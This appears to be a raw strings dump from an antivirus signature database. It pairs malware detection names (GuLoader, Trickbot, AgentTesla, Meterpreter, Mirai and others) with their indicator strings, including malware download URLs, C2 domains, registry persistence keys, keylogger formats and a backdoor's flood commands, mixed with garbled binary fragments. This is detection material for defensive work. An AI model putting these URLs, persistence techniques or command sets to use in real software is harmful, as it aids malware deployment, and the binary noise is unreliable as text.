@trnw QL@@M)\".%9 !a x !#ALF:TrojanDownloader:Win32/GuLoader.SIB!MTB !#Lowfi:HSTR:Win32/CnetInstaller http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x !#Lowfi:HSTR:Win32/PhpNuke http://download.phpnuke.org/installers/extra_software/coupish/coupish-x Z2VuYWthayBRY2xmfFVkb0R1cwhZS0x2fEpRQFFKVVt1cy4da250cm5laRwVaGvQAXMMdnwaGQkEFQIPDg8RBa5hc25wcmJvY1ZhXa5Za254ekpxREdZS45RQ05AQkpJdGaunWtudA== Z2VuYWthayBRY2xmfFVkb0R1cwhZS0x2fEpRQFFKVVt1cy4da250cm5laRwVaGvQAXMMdnwaGQkEFQIPDg8RBa5hc25wcmJvY1ZhXa5Za254ekpxREdZS45RQ05AQkpJdGaunWtudA==x !#HSTR:Win32/Trickbot.16 fo6YwqQUp3lRtIW8ySPbWPZhqSq5JZP0aQAN8wHicLCmeSNTzTBM7H4K8Dxg LFCS5ffL}t3%PrsgVdtAbrlA$IE|6XS7Z{e1Ba2NNFf4VRfr09iimFEC2SihiQ%Zfw3eE@4fnwR$ LFCS5ffL}t3%PrsgVdtAbrlA$IE|6XS7Z{e1Ba2NNFf4VRfr09iimFEC2SihiQ%Zfw3eE@4fnwR$x !#HSTR:PWS:Win32/Zbot.Citadel !#ALF:TrojanSpy:Win32/Ursnif.ARH!MTB {92CFC1A4E0924D909728DA95EA92EC0B} -insta msidntld32 msidntld64 radardt32 radardt64x !#HSTR:Nivdort.DZ1!Sleep !#ALF:HSTR:MSIL/StubDownloader dl.fc-start.website/stub_maker.php?program= NO time check url inputx !#ALF:Backdoor:Win32/Negoka.A!dha bbs.swgabeg.com t <2t\t42 D$2Vf D$4If D$6Cf D$:Pf D$<3f D$>2f D$@.f D$Bdf !#HSTR:Cripscups.A1 get_Keyboard get_CapsLock get_Keyboardget_CapsLock ServerComputer add_TickHideServerComputer add_Shutdown Circus.Res add_ShutdownCircus.Res tem32\\system.exe Circus\\obj\\Debug\\Circus Circus\\obj\\Debug\\Circusx !#do_exhaustivehstr_rescan_nivdort_a !#ALF:VirTool:CeeInject.LR!bit j@h0SPQ j@h0SjR !#ALF:VirTool:Win32/Crdrpi.D!MTB COMPlus_ETWEnabled !#ALFPER:HSTR:ClickMeIn_ConvertAd.A1 !#HSTR:Trojan:Win32/Koobface.gen!E if exISt \"C:\\myapp.exe\" GOTO &c_fb=%d&c_ms=%d&c_hi=%d&c_be=%d&c_fr=%d (&c_fb=%d&c_ms=%d&c_hi=%d&c_be=%d&c_fr=%d &c_fb=%d&c_ms=%d&c_hi=%d&c_tw=%d readyStatex !#AllowList:HSTR:Win32/Centinel.A Centinel.yml Centinel.exe Software\\Centinel Uninstall\\Centinel Humano Software S.L. Monitor Alerta Temprana Cryptowall Monitor Alerta Temprana Cryptowallx !#HSTR:Gamarue_Dll_Loader desktop.ini dpmmBmbvusjW}fmjGebfS}fmjGfubfsD}XfuvdfyFmmfiT desktop.inidpmmBmbvusjW}fmjGebfS}fmjGfubfsD}XfuvdfyFmmfiT |VirtualAlloc| |CreateFileA| |ShellExecuteW| |ReadFile| |ReadFile|x !#Lowfi:HackTool:Win32/Trtool!dha telnet /$ capCreateCaptureWindowA acmDriverOpen QueryServiceStatus GetEnhMetaFileHeader GetEnhMetaFileHeaderx !#ALF:Program:Win32/Webcompanion BingDefaultSearch DefaultSearchYahoo RevertSearchHomepage SearchEngineList GetSearchEngines WebCompanionInstaller WebCompanionInstallerx !#HSTR:Worm:Win32/Braban.A w32_sharedptr->size == sizeof(W32_EH_SHARED) ,w32_sharedptr->size == sizeof(W32_EH_SHARED) MSBLClass \tMSBLClass IMWindowClass LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32 LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32x !#HSTR:Copali_PathChecker mDwnld mDwnldx !#HSTR:Trojan:Win32/Spynoon.SSMA30!MTB yq0p7yh555u \\pwlxkozl.dll a8w1iehd701z \\taplipg.dll IIDFromString DllUnregisterServerx !#HSTR:Trojan:MSIL/AgentTesla.OXBK!MTB L Substringx !#HSTR:Trojan:MSIL/AgentTesla.OXF!MTB 1 GetTypex !#HSTR:Trojan:MSIL/AgentTesla.OXO!MTB 3 FallbackBuffer WSTRBufferMarshalerx !#HSTR:Trojan:MSIL/AgentTesla.OXJA!MTB / !#ALF:Trojan:Win32/Zbot.SIBD17!MTB !#HSTR:MSIL/Obfuscator.GenDecnryptAlgo.N ProximityCardReader\\obj\\Debug\\ProximityCardReaderInterface.pdb ProximityCardReader\\obj\\Debug\\ProximityCardReaderInterface.pdbx !#HSTR:PossibleSkypeSpammer goo.gl/V8WLv9 goo.gl/NYw7G3 goo.gl/1m01vw goo.gl/8289Yj goo.gl/cGdTRw goo.gl/z2yjU8 goo.gl/Z3uGPB goo.gl/Bk2JO5 goo.gl/Bk2JO5x !#ALF:Trojan:Win32/TrickBot.CE!MTB MOfH?6M42F252loLt0N~7?COsSwyith8HYnnP %MOfH?6M42F252loLt0N~7?COsSwyith8HYnnP !#Lowfi:HSTR:Win32/YYRun YYRun.exe start. argc is: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Ext\\Preapproved\\{AAC9EA5D-F954-4D28-9E7C-96E45D80125A} HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Ext\\Preapproved\\{AAC9EA5D-F954-4D28-9E7C-96E45D80125A}x !#SLF:Win64/ScareCrow.B D$(0H D$0@H D$ @H !#ALF:HSTR:Trojan:Win32/Expetost.A JUMAN %03%01www%02facil-programas%02com%02br/ %02zip /notify%02php !#HSTR:Backdoor:Win32/Fynloski.gen Software\\Microsoft\\Active Setup\\Installed Components\\{ StubPath Software\\Microsoft\\Active Setup\\Installed Components\\{StubPath Windows Media Windows Media\\system32\\svchost.exe WindowsDefend WindowsDefend\\explorer.exex !#ALFPER:HSTR:ElexCrashReportText.A name=yac_download name=yac_softonic name=yac_tamindir name=yac_baixaki %s/inf/geturl/%s%s /yet-another-cleaner- /yet-another-cleaner-x !#ALF:HSTR:GamaruePl_KL \"},{\"t\":%lu,\"p\":\"%s\",\"c\":\"%s%s\",\"d\":\"%s ,\"kl\":\" Pj@WV !#ALF:HackTool:Win32/Tokenise.A!MTB |$@}# !#ALF:Trojan:Win32/Downloader.SafeZip.AS!MTB http://talele.50megs.com/Installer/safe.zip +http://talele.50megs.com/Installer/safe.zipx !#HSTR:Adware:Win32/ZoomyLib.B ForceRemove {72351B45-9636-4F99-820B-7C552D27897D} = s 'Zoomify' wit4ie.WitBHO = s 'Zoomify' {99C1EDDE-1A80-48EA-BD58-CEA4B2DFAC81} {99C1EDDE-1A80-48EA-BD58-CEA4B2DFAC81}x !#HSTR:Program:Win32/PCSpeedUp SOFTWARE\\Speedchecker Limited\\PC Speed Up pcsuservice.exe PCSUQuickScan.pdb PCSUQuickScan.pdbx !#ALF:Trojan:Win64/Vigerson.A!dha project_viber /usr/local/Cellar/go/1.13/libexec/src/internal/cpu/cpu.go main.dumpWholeRegion expand 32-byte kexpand 32-byte k expand 32-byte kexpand 32-byte kx !#TEL:Hacktool:Win32/ArtemisFall.A!dha %s -b x.x.x.x/x 80,8080 -o result.txt %s -s x.com -o result.txt [+] banner hunter for %s : %s [+] vul hunter for %s : %s [+] vul hunter for %s : %sx !#TEL:Trojan:Win32/GeneriousPortion.A!dha ^^The %d Adapter^^ The sticking text is: the NIC information is changed to be: thumbcache_96.dbx thumbcache_23.dbx thumbcache_23.dbxx !#TEL:TrojanSpy:Win32/KediRat.B!dha implant.exe %tEXtdate:create EncryptedKedi\\standard\\obj\\Release\\implant.pdb mangoseed reader_sl.hnt Kedi.Loader Kedi.Loaderx !#HSTR:HackTool:MSIL/Anonip set_zpravavsemspamtimer SkypeTOPA\\obj\\Debug\\PnonaSkype.pdb SkypeTOPA\\obj\\Release\\PnonaSkype.pdb Programoval: TOPAx icrosoft\\Windows\\CurrentVersion\\Run WindUp C:\\COMMAND.COM /C DEL http://windowsupdate.microsoft.com http://67.15. lib.htm !#ALF:TrojanDropper:Win32/Maxinull.C!dha DsfbufQspdfttB XiS92BfOXoyRp5V6932M dne/fyf ... i --> image/x-xbitmap ProxyOverridex !#ALF:HackTool:Win64/Megacmd.A!dha ;list ;dele ;move ;mkdi ;mkdix !#HSTR:Trojan:MSIL/Tnega.PAA!MTB TextBoxxxFromBase64CharArrayx !#HSTR:Trojan:MSIL/AgentTesla.OXDM!MTB X Replacex !#HSTR:Trojan:MSIL/AgentTesla.VP49!MTB T W__________W X__________X !#HSTR:Backdoor:Win32/Silby :Received Shell Code! .exec MODE %s +i udp flood \tudp flood syn flood \tsyn flood usbspread \tusbspread nick %s \\emule\\incoming\\ scripts/%2e scripts/%2ex !#ALF:PSW:MSIL/Disstl.BAC!MTB 7 Discord DiscordSocketClient DiscordRpcClient discord.gg/gEN6X25fuz discord.gg/gEN6X25fuzx !#ALF:Trojan:Win32/Zbot.SIBC8!MTB !#HSTR:Win32/CVE-2020-0787.B !#ALF:PUA:Staged:Bibibei t.bibibei.com/thinker/ \\thinkerIE\\thinker\\Release\\thinker.pdb {13AE4E2B-0FE0-46F9-9BF4-FD81F0C8B930}x !#LOWFI:Trojan:Win32/ModifiedExecutable!KcrcBeWare tcrypt_cl2\\tcrypt_cl2\\Release\\s_high.pdb tcrypt_cl2\\tcrypt_cl2\\Release\\s_low.pdb \\tcrypt\\Release\\s_high.pdb \\tcrypt\\Release\\s_low.pdb \\tcrypt\\Release\\s_low.pdbx !#SLF:Win64/ScareCrow.A 82630411e5df0e0cKernel32 {55F154C0-CDAF-45C4-9A1A-852FF51F951E}x !#ALFPER:Trojan:Win32/Forsang.D!dha j6jqf !#HSTR:TrojanDownloader:Win32/Renos.gen!BB.1 !#Trojan:Win32/Scoreem d1.kuai8.com/setup/kuai8_rjaz.exe GM_downloading \\TheWorld\\TheWorld.inix !#ALF:Backdoor:Win32/PlugX.AE!dha ijlqtyz48DEJKNTUZchinqwxy56 Acrobat.dxex !#ALFPER:HSTR:LinkuryDecryptAPI.A1 !#HSTR:Program:Win32/Pameseg!Strings SendSMS 0930399999 1645976 19995577 2406415 483233 676849 8109580 90645045 9090199 91810700 91810700x !#TEL:Hacktool:Win32/Pladiddle.A K8team Swiss Army Knife K8_Dragon_Claw_Blade K8 Dragon Claw Bladex !#HSTR:KINGSOFT DubaTool_Viking kingsoft.com (Kingsoft Corporation kksetupext using Kingsoft Product! using Kingsoft Product!x !#ALF:HSTR:Backdoor:Linux/Exaramel.STA ExecStartPre=/bin/rm -f /tmp/.applock /time.get/ /attachment.get/ /tasks.get/ /tasks.report/ odhyrfjcnfkdtslt odhyrfjcnfkdtsltx !#HSTR:TrojanDownloader:Win32/Zlob.BT.1 oft\\Wind rer\\Brow res://%s\\s%s%s%s04.htm ll/http_4 l/dnsex !#HSTR:Trojan_HashApp PostId= &PostData= QueryId= PostId=&PostData=QueryId= -NQgiR;uReply pn=-&fa= !#HSTR:Wizrem.X1.PrintHelperUtility PrintHelperUtility showIn_special_Browser internt_explorer GetInstalledBrowser IE.HTTP FirefoxURL ChromeHTML ChromeHTMLx !#ALF:HSTR:Trojan:Win32/Depcen.A Ph:=c !#ALF:Ransom:Win32/EregorCrypt.SN!MTB !#ALFPER:HSTR:Eorezo_MobilePCStarterKit.A1 mobilepcstarterkit \"url\":\"http://mobilepcstarterkit.com/ \"silentLoader\":\"true\" .com/cgi-bin/main.cgi \"appPartner\": \"appPartner\":x !#ALF:Trojan:MSIL/AgentTesla.SEX!MTB AZJCJfpyUsnAfJiyTLOifhLwQLhZwGQnrnOfJOn yhxGkJfDMpTfiUkihOywMGfEhw RegAsm.exe RegAsm.exex !#PUA:Block:Soctuseer WajamInternetEnhancer.exe WAJAM_REG_KEY FakeTunnel no decryption for you :) Global\\Wajam.Proxy.AbnormalTermination WajamMutext WajamMutextx !#Hacktool:Win32/AceHash!dha NO PASSWORD********************* Host Type User Password (Got %d) SamIFree_SAMPR_USER_INFO_BUFFER SamIFree_SAMPR_USER_INFO_BUFFERx !#HSTR:Win32/Meterpreter.P Needs Win32! VirtualAllocx !#SLF:Win32/SharpMapExec.A SharpMapExec. /m:shares /m:exec /m:assembly /m:secrets Rubeus. SharpKatz. SharpDPAPI SharpDPAPIx !#HSTR:Win32/Predator.AR1!EML Project51.dll Mfkeoxlzmclr Project51.dllMfkeoxlzmclr YVfgfgfgfgfg .dllYVfgfgfgfgfg YUcoedrockdk Rcxlxosdkhvclf .dllRcxlxosdkhvclf 2xbK*? ecP8/ ecP8/ =^!>~ ~iXWDJ ee'6 ?^3a xm`M>c#tP eg3p eh8J +FmCVW U1Ffd el5V elZo\t elZo\t ?%TF6 1akI enz1 To,kE jf?;e eqX? eql9 er%oC er%oC x$0fR UOB8&! \tanE etW.u etW.u eu.\ty eu.\ty owUIb ewFd ey;] 7LB6~ Pka0 Bwi /]ImH.{y |TJiJ >Q45\t3 q]M%& u#V$$4 khbtl G0X<| o&<3 e)\"'K \\JigA dVhOn E@Jpn !GD@oV !J|PA V~asuKH #|h/! .JCdNs( Ld CN'K} P[<0p a8cZ/L |AzMa ]phoG. $ay^wKYH0 MKE]y Dlq[M uTzWlvG ,tWur _ AkO xItNq 8__%y FPvEM- nev,b CUk,E~ 8]5Ez% }'DJ/]H ^M jE yhpz`0 #eewYO X;*v& Q-5\\M 2h Mt` -kf2Cc/& %aPdi x?FW+w Q!9v/4 iL&snDq [vV t ve%,Q \tI&?dZ& G6H$?ts J|`I* f P ?MCJ' bTSPO :c?g \t :c?g \t [n1 (8a!g 6\tGg& 6\tGg&g %sg&g (hsal (hsalg I*g&g 3yg&g WG<g& WG<g&g -eaJg rc0g& rc0g&g hag&g dz\t)s dz\t)sg #s|g& #s|g&g p2g&g &,bl# &,bl#g Q7g&g Cexg \t Cexg JCxag )Pljg \t\"17H \"u/FU \t\"u/FU \"xT+~ \t\"xT+~ \t#Qb\\ \t#U7H $9S*g& \t$9S*g&g \t$z?w \t%,\t9 \t%`(> \t%sH^ %{\tYxW \t%{\tYxWg -yg&g \t&bUz &r}Tg \t&r}Tg \t&t) '4{-g \t'4{-g \t'8F: \t'^J8 \t't}@ (Nd{lj \t(Nd{ljg )?}+~ \t)?}+~ *fgcx[ \t*fgcx[g \t+#Me \t+W/M \t+w[v 1-0 Library FileVersion10.0.10126.0 (GitEnlistment(amopslocal).210831-1009)V InternalNameapi-ms-win-crt-time-l1-1-0 Microsoft Corporation. All rights reserved.^ OriginalFilenameapi-ms-win-crt-time-l1-1-0j% $ .rsrc( @@.relocj@ bad allocationT gmyapp.exeG FRSDS vccorlib110.pdb memcmpntdll.dll) GetProcessHeap/ HeapFreeKERNEL32.dllbd.a VCCORLIB110.DLL ??0Delegate@Platform@@Q$AAA@XZ ??0Delegate@Platform@@QAE@XZ ??0Object@Platform@@Q$AAA@XZ ??0Object@Platform@@QAE@XZ ?Allocate@Heap@Details@Platform@@SAPAXI@Z ?Free@Heap@Details@Platform@@SAXPAX@Z ?GetActivationFactoryByPCWSTR@@YGJPAXAAVGuid@Platform@@PAPAX@Z ?GetCmdArguments@Details@Platform@@YAPAPA_WPAH@Z ?GetIBoxArrayVtable@Details@Platform@@YGPAXPAX@Z ?InitializeData@Details@Platform@@YAJH@Z ?UninitializeData@Details@Platform@@YAXH@Z \t VCCORLIB110.DLL??0Delegate@Platform@@Q$AAA@XZ??0Delegate@Platform@@QAE@XZ??0Object@Platform@@Q$AAA@XZ??0Object@Platform@@QAE@XZ?Allocate@Heap@Details@Platform@@SAPAXI@Z?Free@Heap@Details@Platform@@SAXPAX@Z?GetActivationFactoryByPCWSTR@@YGJPAXAAVGuid@Platform@@PAPAX@Z?GetCmdArguments@Details@Platform@@YAPAPA_WPAH@Z?GetIBoxArrayVtable@Details@Platform@@YGPAXPAX@Z?InitializeData@Details@Platform@@YAJH@Z?UninitializeData@Details@Platform@@YAXH@Z< CompanyNameMicrosoft Corporation` FileDescriptionWindows vccorlib110 Library InternalNamevccorlib110 OriginalFilenamevccorlib110j% L0h0l0p0t0x0|0 DL0h0l0p0t0x0|0 1%1N1 2)2H2X2_2q2x2 2)2H2X2_2q2x2 $ `.rsrc @@.relocJ0 mssign32.pdb mssign32.pdb3 MSSIGN32.DLL FreeCryptProvFromCert GetCryptProvFromCert PvkFreeCryptProv PvkGetCryptProv PvkPrivateKeyAcquireContext PvkPrivateKeyAcquireContextA PvkPrivateKeyAcquireContextFromMemory PvkPrivateKeyAcquireContextFromMemoryA PvkPrivateKeyLoad PvkPrivateKeyLoadA PvkPrivateKeyLoadFromMemory PvkPrivateKeyLoadFromMemoryA PvkPrivateKeyReleaseContext PvkPrivateKeyReleaseContextA PvkPrivateKeySave PvkPrivateKeySaveA PvkPrivateKeySaveToMemory PvkPrivateKeySaveToMemoryA SignError SignerAddTimeStampResponse SignerAddTimeStampResponseEx SignerCreateTimeStampRequest SignerFreeSignerContext SignerSign SignerSignEx SignerTimeStamp SignerTimeStampEx SpcGetCertFromKey MSSIGN32.DLLDllRegisterServerDllUnregisterServerFreeCryptProvFromCertGetCryptProvFromCertPvkFreeCryptProvPvkGetCryptProvPvkPrivateKeyAcquireContextPvkPrivateKeyAcquireContextAPvkPrivateKeyAcquireContextFromMemoryPvkPrivateKeyAcquireContextFromMemoryAPvkPrivateKeyLoadPvkPrivateKeyLoadAPvkPrivateKeyLoadFromMemoryPvkPrivateKeyLoadFromMemoryAPvkPrivateKeyReleaseContextPvkPrivateKeyReleaseContextAPvkPrivateKeySavePvkPrivateKeySaveAPvkPrivateKeySaveToMemoryPvkPrivateKeySaveToMemoryASignErrorSignerAddTimeStampResponseSignerAddTimeStampResponseExSignerCreateTimeStampRequestSignerFreeSignerContextSignerSignSignerSignExSignerTimeStampSignerTimeStampExSpcGetCertFromKey FileDescriptionWindows mssign32 Library InternalNamemssign32 OriginalFilenamemssign32j% \\0e0y0 8\\0e0y0 1>1G1P1g1\t2 1>1G1P1g1\t2y $ .text+ @@.relocd0 adptif.pdb adptif.pdb3 ExitProcessKERNEL32.dll`c.a ADPTIF.DLL CreateSocketPort DeleteSocketPort FwBindFwInterfaceToAdapter FwConnectionRequestFailed FwCreateInterface FwDeleteInterface FwDisableFwInterface FwEnableFwInterface FwGetInterface FwGetNotificationResult FwGetStaticNetbiosNames FwIsStarted FwNotifyConnectionRequest FwSetInterface FwSetStaticNetbiosNames FwStart FwStop FwUnbindFwInterfaceFromAdapter FwUpdateConfig FwUpdateRouteTable GetAdapterNameFromMacAddrW GetAdapterNameW GetFilters IpxAdjustIoCompletionParams IpxCreateAdapterConfigurationPort IpxDeleteAdapterConfigurationPort IpxDoesRouteExist IpxGetAdapterConfig IpxGetAdapterList IpxGetOverlappedResult IpxGetQueuedAdapterConfigurationStatus IpxGetQueuedCompletionStatus IpxPostQueuedCompletionStatus IpxRecvPacket IpxSendPacket IpxWanCreateAdapterConfigurationPort IpxWanQueryInactivityTimer IpxWanSetAdapterConfiguration SetFilters !\"#$%&'ADPTIF.DLLCreateSocketPortDeleteSocketPortFwBindFwInterfaceToAdapterFwConnectionRequestFailedFwCreateInterfaceFwDeleteInterfaceFwDisableFwInterfaceFwEnableFwInterfaceFwGetInterfaceFwGetNotificationResultFwGetStaticNetbiosNamesFwIsStartedFwNotifyConnectionRequestFwSetInterfaceFwSetStaticNetbiosNamesFwStartFwStopFwUnbindFwInterfaceFromAdapterFwUpdateConfigFwUpdateRouteTableGetAdapterNameFromMacAddrWGetAdapterNameWGetFiltersIpxAdjustIoCompletionParamsIpxCreateAdapterConfigurationPortIpxDeleteAdapterConfigurationPortIpxDoesRouteExistIpxGetAdapterConfigIpxGetAdapterListIpxGetOverlappedResultIpxGetQueuedAdapterConfigurationStatusIpxGetQueuedCompletionStatusIpxPostQueuedCompletionStatusIpxRecvPacketIpxSendPacketIpxWanCreateAdapterConfigurationPortIpxWanQueryInactivityTimerIpxWanSetAdapterConfigurationServiceMainSetFilters FileDescriptionWindows adptif Library InternalNameadptif OriginalFilenameadptifj% Z0c0l0u0~0 XZ0c0l0u0~0 1 1)121;1D1M1V1_1h1q1z1 ; ]Q\\ :Y[L ?zw=&Tcszg 7P 9&6 Q-e[jC .];No'vLk Ty0tk4 eT<>U ^X\tGVyL 5|:w_ ,_V O @'[)Smp @0;xG p&C@= ~hzvF| D=ckaTdLtW s{ 8c D8z:LK iC725 +h=,p pRPec `cA2X L3S,# Ls4 X\"] Sxex[I SaB) i|L#\tZQ i8ws\\ niJvq Q+OwLU S D| nMh/l# vUo5`e {PZON e,|={ 0*;>X /,&)J G% db S#U]e S#U]e EF4>*hf S(.3 H$*\\h S,Fo S/*>j S/*>j yCC/&, S;U!(R S3'+ S4#oR S4#oR =(D{ #/]]vX S={m S>B$1 S>B$1 2=(L_ n`w `3 SH\\\t SI\\6 h2g<= :DL!' YgN%|Q P'c$Gp mrIqB _r(g2 $p)w3&S NT..E &Sfn3 qir4: fTq1} $&F]p I#.W + 0E/Kp 4)iQ^= :,] U *elo*M L}Xop io% ~( [xV.Hp 0nPT9J ,2MI( ,vnC; kI9*]tp J1tp; Wh:;Ob h @\\~ N3`pomp gL\tup P]\\4{p 9O,V ~2`r> \t\\p4=6 Xn$%q !,,>p EaCNp \"M^Ro V0~,z <''m! ?R/Y%F)+a %9`jj (Voc) 6|FO\\ :e\\z5 <= t# wT-F,s _LgU/ )V{B{p DI q` Ot:@Kp hRzGy C; kWp zEval:TrojanWin32/Occamy.CC0 )!#ALF:HeraklezEval:TrojanWin32/Casdet!rfn )!#ALF:HeraklezEval:Trojan:AndroidOS/Koler o a2 )!#ALF:HeraklezEval:RansomMacOS/KeRanger.A )!#ALF:HeraklezEval:Backdoor:Linux/Mirai.B )!#ALF:HeraklezEval:TrojanWin32/Adload!rfn )!#ALF:HeraklezEval:TrojanWin32/Occamy.CF6 )!#ALF:HeraklezEval:TrojanWin32/Occamy.C22 )!#ALF:HeraklezEval:TrojanAndroidOS/Kmin.A )!#ALF:HeraklezEval:TrojanWin32/Occamy.CE8 )!#ALF:HeraklezEval:Trojan:MacOS/Occamy.AA )!#ALF:HeraklezEval:TrojanWin32/Azorult!ml )!#ALF:HeraklezEval:ProgramMacOS/Occamy.AA )!#ALF:HeraklezEval:TrojanWin32/Occamy.C08 )!#ALF:HeraklezEval:TrojanWin32/Ymacco!rfn )!#ALF:HeraklezEval:TrojanWin32/Occamy.C1E )!#ALF:HeraklezEval:TrojanWin32/Tiggre!rfn )!#ALF:HeraklezEval:TrojanWin32/Occamy.C60 )!#ALF:HeraklezEval:TrojanAndroidOS/Ymacco )!#ALF:HeraklezEval:TrojanWin32/Occamy.CEF )!#ALF:HeraklezEval:TrojanWin32/Occamy.C81 )!#ALF:HeraklezEval:TrojanWin32/Occamy.C4D :nn:\t d;QT- )!#ALF:HeraklezEval:TrojanWin32/Occamy.C1D )!#ALF:HeraklezEval:TrojanWin32/Occamy.C2C )!#ALF:HeraklezEval:TrojanWin32/Occamy.C75 )!#ALF:HeraklezEval:ProgramWin32/Occamy.AA d]0x| )!#ALF:HeraklezEval:Backdoor:Win32/Autorun )!#ALF:HeraklezEval:TrojanWin32/Occamy.C3C ]4X'dE :]4X'dE /*') ?J#\t L[T2P :L[T2P )!#ALF:HeraklezEval:TrojanWin32/Occamy.C0E )!#ALF:HeraklezEval:Trojan:MacOS/Brocoiner )!#ALF:HeraklezEval:TrojanWin32/Occamy.CC0 )!#ALF:HeraklezEval:TrojanWin32/Occamy.C16 )!#ALF:HeraklezEval:TrojanWin32/Occamy.C00 ;gWZ\\ )!#ALF:HeraklezEval:TrojanWin32/Occamy.C34 )!#ALF:HeraklezEval:TrojanWin32/Occamy.C6C )!#ALF:HeraklezEval:TrojanWin32/Occamy.C01 J fD&8 N6?nIv )!#ALF:HeraklezEval:TrojanWin32/Occamy.C02 U2QC9 )!#ALF:HeraklezEval:TrojanWin32/Occamy.C03 )!#ALF:HeraklezEval:TrojanWin32/Occamy.CCC )!#ALF:HeraklezEval:TrojanWin32/Occamy.C09 )!#ALF:HeraklezEval:TrojanWin32/Occamy.C0F )!#ALF:HeraklezEval:Trojan:Win32/Tsingsoft )!#ALF:HeraklezEval:TrojanWin32/Occamy.C73 *!#ALF:HeraklezEval:Trojan:AndroidOS/SmForw *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA29 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.CE1 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA01 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA5A *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA0E *!#ALF:HeraklezEval:Trojan:Win32/Occamy.CBD *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C81 *!#ALF:HeraklezEval:Trojan:Linux/Multiverze *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C5B *!#ALF:HeraklezEval:BackdoorLinux/Mirai!rfn *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C69 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA6A *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA0C *!#ALF:HeraklezEval:DDoS:Linux/Mirai.PA!rfn *!#ALF:HeraklezEval:TrojanWin32/Ymacco.ABF5 *!#ALF:HeraklezEval:Trojan:Linux/RocHid!rfn *!#ALF:HeraklezEval:Ransom:MacOS/KeRanger.A *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA4B *!#ALF:HeraklezEval:Trojan:AndroidOS/Hiddad *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA58 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA03 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C19 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AAD5 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA00 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C5D *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AB95 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AAD2 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C0F *!#ALF:HeraklezEval:Ransom:AndroidOS/Congur *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA39 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.CD2 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA24 *!#ALF:HeraklezEval:Trojan:AndroidOS/Kmin.A *!#ALF:HeraklezEval:BackdoorMSIL/Bladabindi *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA48 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA05 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.ABC2 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA8F *!#ALF:HeraklezEval:Backdoor:Linux/Small.BC *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C4B *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA34 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.CC2 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.CBB *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA19 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA74 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA98 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.ABDE *!#ALF:HeraklezEval:BackdoorMacOS/Flashback *!#ALF:HeraklezEval:TrojanWin32/Glupteba!ml *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AAAC *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AAD1 *!#ALF:HeraklezEval:VirusVBS/Ramnit.gen!rfn *!#ALF:HeraklezEval:Trojan:AndroidOS/Shedun *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C03 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.ABF1 *!#ALF:HeraklezEval:Program:Win32/Occamy.AA *!#ALF:HeraklezEval:Trojan:Win32/Occamy.CFE *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AAD0 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA9E *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AB1F *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AB63 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.ABBF *!#ALF:HeraklezEval:TrojanMacOS/Ymacco.AA9B *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AB60 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.ABCA *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C35 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C08 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.ABA7 *!#ALF:HeraklezEval:Trojan:Win32/Occamy.CAE >6-g! u.+h. *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AAB1 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA88 2:'1: *!#ALF:HeraklezEval:TrojanLinux/CoinMiner.K *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AB2F *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C04 \"oC2A4p *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C86 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.ABA2 *!#ALF:HeraklezEval:TrojanMacOS/Ymacco.AA7A *!#ALF:HeraklezEval:Trojan:Win32/Occamy.C34 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AADC *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AAC3 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA4E *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA72 p!\"9! 